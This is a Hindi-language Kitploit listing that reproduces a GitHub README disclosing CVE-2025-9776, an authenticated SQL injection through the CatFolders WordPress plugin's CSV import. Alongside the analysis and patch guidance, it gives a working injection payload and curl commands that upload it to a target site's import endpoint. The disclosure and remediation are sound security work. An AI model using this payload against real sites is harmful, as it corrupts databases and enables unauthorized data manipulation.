Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-9776 — CVE-2025-9776 — CatFolders WordPress प्लगइन: CSV आयात के माध्यम से प्रमाणित SQL इंजेक्शन | POC + वॉकथ्रू | Kitploit
उपकरण/GitHubGitHub/snailsploit/cve-2025-9776
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेपर और शोधलर्निंग और शिक्षा
GitHubsnailsploit/cve-2025-9776

CVE-2025-9776

CVE-2025-9776 — CatFolders WordPress प्लगइन: CSV आयात के माध्यम से प्रमाणित SQL इंजेक्शन | POC + वॉकथ्रू

रिपॉजिटरी देखें
184 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-9776: CatFolders WordPress प्लगइन में प्रमाणित SQL इंजेक्शन

CVE CVSS Score WordPress Plugin CWE-89 Wordfence

कीवर्ड: CVE-2025-9776, CatFolders WordPress भेद्यता, SQL इंजेक्शन WordPress, प्रमाणित SQL इंजेक्शन, WordPress सुरक्षा, CSV आयात भेद्यता, WordPress प्लगइन शोषण, CWE-89, WordPress डेटाबेस हमला, मीडिया लाइब्रेरी भेद्यता, WordPress CVE 2025

विषय-सूची

  • अवलोकन
  • भेद्यता विवरण
  • तकनीकी विश्लेषण
  • प्रमाण-अवधारणा
  • उपचार मार्गदर्शिका
  • CVSS मेट्रिक्स
  • संदर्भ
  • सुरक्षा संपर्क

अवलोकन

CatFolders WordPress प्लगइन में एक प्रमाणित SQL इंजेक्शन भेद्यता पाई गई है जो Author-स्तर के उपयोगकर्ताओं को दुर्भावनापूर्ण CSV आयात के माध्यम से डेटाबेस क्वेरी में हेरफेर करने की अनुमति देती है।

खोजकर्ता: Kai Aizen (SnailSploit) प्रकाशित: 2025 CVSS स्कोर: 6.5 (मध्यम) CWE: CWE-89 - SQL इंजेक्शन

भेद्यता विवरण

विवरण

CatFolders – Tame Your WordPress Media Library by Category में CSV आयात कार्यक्षमता में एक प्रमाणित SQL इंजेक्शन भेद्यता शामिल है। उपयोगकर्ता द्वारा प्रदान की गई CSV से attachments कॉलम को एक सूची में विभाजित किया जाता है और सीधे FolderModel::set_attachments() को भेजा जाता है, जो उन मानों को उचित स्वच्छता या पैरामीटराइजेशन के बिना कच्चे SQL IN (...) खंडों में जोड़ता है।

प्रभाव

यह भेद्यता प्रमाणित हमलावरों को Author-स्तर के विशेषाधिकारों के साथ निम्नलिखित की अनुमति देती है:

  • मनमानी SQL क्वेरी निष्पादित करना
  • फ़ोल्डर-अटैचमेंट मैपिंग का सामूहिक विलोपन या हेरफेर
  • पेलोड और डेटाबेस संरचना के आधार पर संभावित डेटा एक्सपोज़र
  • डेटाबेस अखंडता और उपलब्धता से समझौता करना

प्रभावित संस्करण

  • असुरक्षित: सभी संस्करण ≤ 2.5.2
  • पैच किया गया: संस्करण 2.5.3 और उसके बाद (विक्रेता से सत्यापित करें)

CVSS v3.1 मेट्रिक्स

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
मीट्रिकमान
हमला वेक्टरनेटवर्क (AV:N)
हमला जटिलताकम (AC:L)
आवश्यक विशेषाधिकारकम (PR:L) - Author+
उपयोगकर्ता सहभागिताकोई नहीं (UI:N)
दायराअपरिवर्तित (S:U)
गोपनीयताकोई नहीं (C:N)
अखंडताकम (I:L)
उपलब्धताकम (A:L)

तकनीकी विवरण

असुरक्षित कोड पथ

भेद्यता CSV आयात वर्कफ़्लो में मौजूद है:

फ़ाइल: includes/Rest/Controllers/ImportController.php

  1. import_csv विधि प्रति-फ़ील्ड स्वच्छता के बिना अपलोड की गई CSV को पार्स करती है
  2. restore_folders() कॉल करता है:
FolderModel::set_attachments( 
    $new_folder['id'], 
    explode(',', $folder['attachments']), 
    false 
);

फ़ाइल: includes/Models/FolderModel.php

  1. set_attachments() स्ट्रिंग संयोजन का उपयोग करके कच्चा SQL बनाता है:
'raw' => 'post_id IN (' . $attachmentIds . ')'
  1. प्रत्येक तत्व को पूर्णांक में नहीं डाला जाता और न ही पैरामीटराइज़ किया जाता है, जिससे SQL इंजेक्शन संभव होता है

हमला वेक्टर

Author-स्तर के विशेषाधिकारों (upload_files क्षमता) वाला हमलावर CSV आयात एंडपॉइंट के माध्यम से दुर्भावनापूर्ण SQL इंजेक्ट कर सकता है:

दुर्भावनापूर्ण CSV पेलोड:

id,name,attachments
1,Test Folder,"1) OR 1=1--"

परिणामी असुरक्षित क्वेरी:

SELECT folder_id FROM wp_catf_folder_posts 
WHERE post_id IN (1) OR 1=1--)

यह IN(...) खंड से बाहर निकलता है और क्वेरी के अर्थ को बदल देता है, संभावित रूप से सभी पंक्तियों को प्रभावित करता है।

आवश्यक शर्तें

  • लक्ष्य WordPress साइट पर Author-स्तर का खाता (या उच्चतर)
  • CatFolders प्लगइन स्थापित और सक्रिय
  • REST API आयात एंडपॉइंट तक पहुंच

प्रमाण-अवधारणा

चरण 1: REST नेमस्पेस खोजें

curl -s https://target.site/wp-json | jq -r '.routes | keys[]' | grep '/import-csv$'

सामान्य परिणाम: /catf/v1/import-csv

चरण 2: दुर्भावनापूर्ण CSV तैयार करें

catf_inject.csv नामक फ़ाइल बनाएँ:

id,name,attachments
1,Malicious Folder,"1) OR 1=1--"

चरण 3: हमला निष्पादित करें

NS="/catf/v1"  # खोजे गए नेमस्पेस से बदलें

curl -i \
  -u 'author_user:APPLICATION_PASSWORD' \
  -F "file=@catf_inject.csv;type=text/csv" \
  -X POST "https://target.site/wp-json${NS}/import-csv"

अपेक्षित प्रतिक्रिया:

{ "success": true }

प्रभाव प्रदर्शन

सर्वर निर्माण और निष्पादित करता है:

SELECT folder_id FROM wp_catf_folder_posts WHERE post_id IN (1) OR 1=1--)

यह इच्छित से अधिक व्यापक DELETE/INSERT संचालन कर सकता है, अक्सर पूरे डेटाबेस में फ़ोल्डर-अटैचमेंट संबंधों को मिटा देता है।

सुरक्षित परीक्षण वातावरण

भेद्यता को सुरक्षित रूप से देखने के लिए स्टैंडअलोन SQLite सिमुलेशन चलाएँ:

python3 poc/catfolders_sql_poc.py

यह असुरक्षित क्वेरी प्रिंट करता है और दिखाता है कि कैसे एक दुर्भावनापूर्ण टोकन सभी पंक्तियाँ लौटाता है, जबकि पैरामीटराइज़्ड संस्करण इसे ठीक से अस्वीकार करता है।

उपचार

साइट प्रशासकों के लिए

तत्काल कार्रवाई आवश्यक:

  1. CatFolders को 2.5.3 या बाद के संस्करण में अपडेट करें
  2. Author-स्तर या उच्चतर विशेषाधिकारों वाले उपयोगकर्ता खातों की समीक्षा करें
  3. प्रभावित तिथियों के बीच संदिग्ध क्वेरी के लिए डेटाबेस लॉग ऑडिट करें
  4. अप्रत्याशित संशोधनों के लिए फ़ोल्डर-अटैचमेंट मैपिंग जाँचें

डेवलपर्स के लिए

दो न्यूनतम सख्तीकरण चरण:

1. मॉडल को कॉल करने से पहले IDs को स्वच्छ करें

- FolderModel::set_attachments( $new_folder['id'], explode(',', $folder['attachments']), false );
+ $ids = array_filter( array_map( 'intval', explode(',', $folder['attachments']) ) );
+ if ( ! empty( $ids ) ) {
+     FolderModel::set_attachments( (int) $new_folder['id'], $ids, false );
+ }

2. set_attachments() के अंदर पूर्णांक लागू करें

  $imgIds = apply_filters( 'catf_attachment_ids_to_folder', $imgIds );
+ $imgIds = array_values( array_filter( array_map( 'intval', (array) $imgIds ) ) );

मजबूत सिफारिश

सभी कच्चे SQL संयोजन को WordPress के $wpdb->prepare() का उपयोग करके पैरामीटराइज़्ड क्वेरी से बदलें:

$placeholders = implode(',', array_fill(0, count($imgIds), '%d'));
$query = $wpdb->prepare(
    "SELECT folder_id FROM {$wpdb->prefix}catf_folder_posts WHERE post_id IN ($placeholders)",
    ...$imgIds
);

इसके अतिरिक्त:

  • प्रसंस्करण से पहले सभी CSV फ़ील्ड को सख्ती से मान्य करें
  • API परत पर इनपुट प्रकार सत्यापन लागू करें
  • आयात एंडपॉइंट पर दर सीमा जोड़ें
  • ऑडिट ट्रेल के लिए सभी आयात संचालन लॉग करें

पैच फ़ाइल

एक पूर्ण पैच patch/catfolders_fix.patch में उपलब्ध है

रिपॉजिटरी संरचना

CVE-2025-9776/
├── README.md                    # यह फ़ाइल
├── poc/
│   ├── catf_inject.csv         # दुर्भावनापूर्ण CSV पेलोड
│   └── catfolders_sql_poc.py   # सुरक्षित SQLite सिमुलेशन
└── patch/
    └── catfolders_fix.patch    # अनुशंसित सुधार

समयरेखा

  • खोज तिथि: 2025
  • विक्रेता सूचना: Wordfence के माध्यम से समन्वित प्रकटीकरण
  • सार्वजनिक प्रकटीकरण: 2025
  • पैच उपलब्ध: संस्करण 2.5.3

संदर्भ

  • MITRE CVE प्रविष्टि
  • Wordfence इंटेलिजेंस सलाहकार
  • WordPress प्लगइन निर्देशिका
  • SnailSploit अनुसंधान

क्रेडिट

शोधकर्ता: Kai Aizen (SnailSploit)

प्रकटीकरण प्रक्रिया: Wordfence बग बाउंटी प्रोग्राम के माध्यम से समन्वित

नैतिक विचार

⚠️ महत्वपूर्ण अस्वीकरण

यह प्रमाण-अवधारणा विशेष रूप से रक्षात्मक अनुसंधान और शैक्षिक उद्देश्यों के लिए प्रदान की गई है।

उपयोग दिशानिर्देश

टूल डाउनलोड करें